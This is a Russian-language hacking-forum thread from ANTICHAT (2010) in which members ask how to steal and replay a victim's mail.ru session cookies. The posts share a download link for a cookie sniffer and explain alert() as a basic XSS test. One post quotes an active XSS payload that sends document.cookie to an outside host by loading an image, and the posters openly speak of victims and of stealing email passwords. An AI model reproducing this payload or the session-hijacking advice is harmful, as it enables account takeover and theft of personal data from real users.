HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 27.08.2010, 01:00
HEX xaKer
Постоянный
Регистрация: 30.05.2010
Сообщений: 350
С нами: 8396246

Репутация: 12
По умолчанию

люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!!
 
Ответить с цитированием

  #62  
Старый 27.08.2010, 01:00
zet611
Участник форума
Регистрация: 18.08.2010
Сообщений: 156
С нами: 8281046

Репутация: 7
По умолчанию

Цитата:

Сообщение от HEX xaKer

люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!!

Советую посмотреть видео - http://depositfiles.com/ru/files/1p6w2m91m (Видео от "SOKOL) там все по сифферу,+ ответ и наглядный показ на твой ответ.
 
Ответить с цитированием

  #63  
Старый 29.08.2010, 01:00
kola2468
Участник форума
Регистрация: 28.08.2010
Сообщений: 186
С нами: 8266646

Репутация: -1
По умолчанию

Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.

Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.

И на счёт userhost не понял, какой-нибудь дайте для примера.
 
Ответить с цитированием

  #64  
Старый 30.08.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Цитата:


Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.



Все архивы в полном ажуре, не знаю у кого что битое. Говорят, некоторые авири уже на сам линк ругаются, отключаем, качаем, снова включаем если очень страшно xD

Цитата:


Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.



Цитата:


img = new Image(); img.src = "http://unet.phpnet.us/s/s.gif?"+document.cookie;



Всё наместе, даже выделил. Опять не знаю у кого что недописано.
Кстати, откудаж такие сведения, если архивы битые?

Цитата:


И на счёт userhost не понял, какой-нибудь дайте для примера.



Когда зальёшь сниффер на свой хостинг - вот URL-адрес твоего хоста тебе примером и будет))
 
Ответить с цитированием

  #65  
Старый 15.09.2010, 01:00
Shady3000rf
Постоянный
Регистрация: 29.12.2009
Сообщений: 445
С нами: 8615126

Репутация: 11
По умолчанию

можете разжевать?
Ужасна распрастраннёная узявимость типа

alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.

не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)
 
Ответить с цитированием

  #66  
Старый 15.09.2010, 01:00
blueHack
Участник форума
Регистрация: 05.04.2010
Сообщений: 162
С нами: 8475446

Репутация: 17
По умолчанию

Цитата:

Сообщение от Shady3000rf

можете разжевать?
Ужасна распрастраннёная узявимость типа

alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.

не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)

НЕЕЕ, сообщение такого типа:IMAGE http://hacker-school.ucoz.ru/img/xss/1.png

ПОМОГ +
 
Ответить с цитированием

  #67  
Старый 15.09.2010, 01:00
Shady3000rf
Постоянный
Регистрация: 29.12.2009
Сообщений: 445
С нами: 8615126

Репутация: 11
По умолчанию

ага) эм а что там в этом сообщение должно быть написано? что типо этого нельзя написать или что?:realangel:
 
Ответить с цитированием

  #68  
Старый 15.09.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Shady3000rf, ничего не должно быть. Появление рамки сообщения (alert) свидетельствует о том, что код alert(); выполнился и есть XSS-уязвимость. (возможно внедрение другого произвольного кода)
 
Ответить с цитированием

  #69  
Старый 29.09.2010, 01:00
SPA-MAS
Новичок
Регистрация: 10.03.2010
Сообщений: 1
С нами: 8512886

Репутация: 0
По умолчанию

други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS? или с любуго, который юзер посетил заранее? тоесть по сути, мне надо пароль с почты украсть допустим маил ру, мне надо именно пасивку или активку юзать маила ру, или любого другова сайта и если юзер раньше зашел на маил и потом прошел на сторонний мой сайт с XSS с смоим снифером я получу куки с маила ,или нет?
 
Ответить с цитированием

  #70  
Старый 29.09.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Цитата:

Сообщение от SPA-MAS

други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS?

Да, и никак иначе
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.